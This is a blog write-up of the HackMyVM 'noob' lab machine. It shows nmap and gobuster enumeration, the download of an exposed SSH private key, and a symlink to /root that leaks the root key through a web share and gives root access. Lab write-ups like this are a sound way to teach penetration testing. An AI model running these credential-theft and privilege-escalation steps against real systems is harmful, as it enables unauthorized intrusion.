Post

Noob Writeup HackMyVM

Posted Updated
By Surapura 4 min read

Alt Text

The penetration test began with a nmap scan, which revealed that ports 22 (SSH) and 65530 were open. Further enumeration using Gobuster on port 65530 led to the discovery of the nt4share directory. SSH connection was established using a key found in nt4share. To escalate privileges, a symbolic link was created, granting access to the root account. The penetration test culminated in accessing the root account via SSH using the newly acquired key, enabling the retrieval of the flags.

vm link

» Create a variable for the IP to avoid retyping the address each time

1
2

┌──(kali㉿kali)-[~/Desktop/noob]
└─$ ip=192.168.0.124


Enumeration


» Scan for open ports and services using nmap

  • also try nmap -sCV -p22,65530 -n -Pn -vvv 192.168.0.124 -oN target
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

┌──(kali㉿kali)-[~/Desktop/noob]
└─$ sudo nmap -sC -sV -p- -T4 -A -O $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-18 06:50 IST
Nmap scan report for 192.168.0.124
Host is up (0.00097s latency).
Not shown: 65533 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 66:6a:8e:22:cd:dd:75:52:a6:0a:46:06:bc:df:53:0f (RSA)
|   256 c2:48:46:33:d4:fa:c0:e7:df:de:54:71:58:89:36:e8 (ECDSA)
|_  256 5e:50:90:71:08:5a:88:62:7e:81:07:c3:9a:c1:c1:c6 (ED25519)
65530/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
MAC Address: 08:00:27:6C:C3:C4 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.98 ms 192.168.0.124

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.75 seconds
  • Port 22 & 65530 are open

Alt Text

Gobutser port 65530

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

┌──(kali㉿kali)-[~/Desktop/noob]
└─$ gobuster dir -u http://$ip:65530/ -w /wordlists/directory-list-2.3-medium.txt -x php,txt,html,css,js,zip,bak -t 200
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.124:65530/
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html,css,js,zip,bak
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 19]
/http%3a%2f%2fwww     (Status: 301) [Size: 45] [--> /http:/www]
/http%3a%2f%2fwww.bak (Status: 301) [Size: 49] [--> /http:/www.bak]
/http%3a%2f%2fwww.php (Status: 301) [Size: 49] [--> /http:/www.php]
/http%3a%2f%2fwww.txt (Status: 301) [Size: 49] [--> /http:/www.txt]
/http%3a%2f%2fwww.html (Status: 301) [Size: 50] [--> /http:/www.html]
/http%3a%2f%2fwww.css (Status: 301) [Size: 49] [--> /http:/www.css]
/http%3a%2f%2fwww.js  (Status: 301) [Size: 48] [--> /http:/www.js]
/http%3a%2f%2fwww.zip (Status: 301) [Size: 49] [--> /http:/www.zip]
/http%3a%2f%2fyoutube (Status: 301) [Size: 49] [--> /http:/youtube]
/http%3a%2f%2fswik.html (Status: 301) [Size: 51] [--> /http:/swik.html]
/http%3a%2f%2fswik.css (Status: 301) [Size: 50] [--> /http:/swik.css]
/http%3a%2f%2fswik.js (Status: 301) [Size: 49] [--> /http:/swik.js]
/http%3a%2f%2fswik.zip (Status: 301) [Size: 50] [--> /http:/swik.zip]
/http%3a%2f%2fswik.bak (Status: 301) [Size: 50] [--> /http:/swik.bak]
/http%3a%2f%2fswik.php (Status: 301) [Size: 50] [--> /http:/swik.php]
/nt4share             (Status: 301) [Size: 45] [--> /nt4share/]                                <<<
Progress: 1661144 / 1661152 (100.00%)
===============================================================
Finished
===============================================================

Alt Text

Alt Text

  • Chek keys
  • Let’s try SSH with id_rsa

wget http://$ip:65530/nt4share/.ssh/id_rsa

chmod 600 id_rsa

Establish SSH connection

1
2
3
4
5
6
7
8
9
10
11
12
13
14

┌──(kali㉿kali)-[~/Desktop/noob]
└─$ ssh -i id_rsa adela@$ip
Linux noob 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jun 17 22:18:48 2024 from 192.168.0.190
adela@noob:~$ id
uid=1000(adela) gid=1000(adela) groups=1000(adela),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
adela@noob:~$

Privilege Escalation

» Creating a symbolic link named root that points to the root directory (/root) allows for easy access to the root directory from another location in the filesystem.

1
2
3
4
5
6
7
8
9
10
11
12
13
14

adela@noob:~$ cat /etc/passwd | grep /bin/bash
root:x:0:0:root:/root:/bin/bash
adela:x:1000:1000:adela,,,:/home/adela:/bin/bash
adela@noob:~$ ln -s /root root
adela@noob:~$ ls -al
total 28
drwxr-xr-x 3 adela adela 4096 Jun 17 21:02 .
drwxr-xr-x 3 root  root  4096 Jul 11  2021 ..
-rw-r--r-- 1 adela adela  220 Jul 11  2021 .bash_logout
-rw-r--r-- 1 adela adela 3526 Jul 11  2021 .bashrc
-rw-r--r-- 1 adela adela  807 Jul 11  2021 .profile
lrwxrwxrwx 1 adela adela    5 Jun 17 21:02 root -> /root                                       <<<
drwx------ 2 adela adela 4096 Jul 13  2021 .ssh
-rw------- 1 adela adela   50 Jul 14  2021 .Xauthority
  • lrwxrwxrwx 1 adela adela 5 Jun 17 21:02 root -> /root symbolic link created.
  • Accessing the nt4share again. We have a new directory root Alt Text

Alt Text

» Let’s get id_rsa from root and SSH it.

wget http://$ip:65530/nt4share/root/.ssh/id_rsa

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

┌──(kali㉿kali)-[~/Desktop/noob]
└─$ ssh -i id_rsa root@$ip
Linux noob 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Jun 17 21:10:45 2024 from 192.168.0.190
root@noob:~# ls
root.txt  user.txt
root@noob:~#
  • Now we have both the flags


pwned
Write Up, HackMyVM
Privilege Escalation SSH rsa key symbolic link
This post is licensed under CC BY 4.0 by the author.